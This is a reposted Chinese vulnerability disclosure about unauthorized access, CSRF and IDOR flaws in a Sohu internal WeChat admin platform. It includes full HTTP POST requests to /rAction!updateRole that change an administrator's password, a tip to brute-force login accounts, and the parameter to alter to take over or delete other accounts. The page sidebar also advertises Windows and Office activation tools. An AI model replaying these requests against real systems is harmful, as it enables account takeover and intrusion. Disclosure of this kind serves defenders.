资讯安全论坛下载读书程序开发数据库系统网络电子书微信学院站长学院 QQ 考试

频道栏目

企业安全| 安全资讯| 安全公告| 病毒预警| 人物| 企业招聘| 其他综合|

首页 > 资讯 > 企业安全 > 正文

搜狐某内部系统未授权访问（可执行任意操作）

16-06-17 来源：[db:作者]

收藏我要投稿

搜狐某内部系统未授权访问(可执行任意操作)

搜狐内部IT微信平台

http://wx.sohu-inc.com

你们只修复了命令执行漏洞，却未修复未授权访问问题

页面

/index.jsp

即

http://wx.sohu-inc.com/index.jsp

用这些可以做个字典，跑下登录帐号

页面在注销后前台任然没有验证机制

后台本地帐号或域帐号密码可抓包读取

POST /rAction!updateRole HTTP/1.1

Host: wx.sohu-inc.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://wx.sohu-inc.com/rAction!findRoles

Cookie: JSESSIONID=ABE2A34A2C8134233580BB74BE24D112

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 91

r.managerId=2&r.typeId=1&r.managerEmail=admin&r.managerPwd=xxxx

也存在CSRF问题

POST /rAction!updateRole HTTP/1.1

Host: wx.sohu-inc.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://wx.sohu-inc.com/rAction!findRoles

Cookie: JSESSIONID=ABE2A34A2C8134233580BB74BE24D112

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 91

r.managerId=2&r.typeId=1&r.managerEmail=admin&r.managerPwd=xxxx

修改密码或执行删除等其它操作只需更改r.managerId参数即可

这里涉及了一点关于VPN的问题

解决方案：

权限验证

点击复制链接与好友分享!回本站首页

相关TAG标签

上一篇：oppo软件商店Mysql弱口令引发的血案（影响用户信息与APP下载地址等）

下一篇：2016 ALICTF xxFileSystem write-up

相关文章

热门专题推荐 vmware win7激活工具 win10激活工具 excel word office激活小马激活工具重装系统数据恢复 u盘启动工具

图文推荐

文章

推荐

· 不掉线的路由器！路由特殊技术分析！

· 如何通过路由器来控制上网

· 宽带路由器故障巧排除

· 关于忘记Cisco交换机路由器口令后如何

· 远程管理路由器注意“安全”

· 路由器端口映射的原理及设置方法介绍

· 教你用路由器日志快速定位及排除故障

· 教你设置无线路由提高无线网BT下载速

· win7激活工具

· win10激活工具

· win7激活工具旗舰版

· office2010激活密钥

· windows7激活密钥

· office2010激活工具

· 小马激活工具

· win10激活工具

热门新闻

· 锤子坚果Pro发布后，罗永浩哭了

· 想实习的大学党看过来!这些科技巨头最

· 罗永浩锤子发布会抢先消息：锤子科技新

· Google新一代系统Fuchsia OS界面曝光

· 中国唯一连续运营20余年的网络游戏，还

· iPhone都便宜了为何国产手机越来越贵

· 丢人！谷歌和Facebook竟被虚假企业电邮

· 中国移动支付震惊日本网友为什么美国

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站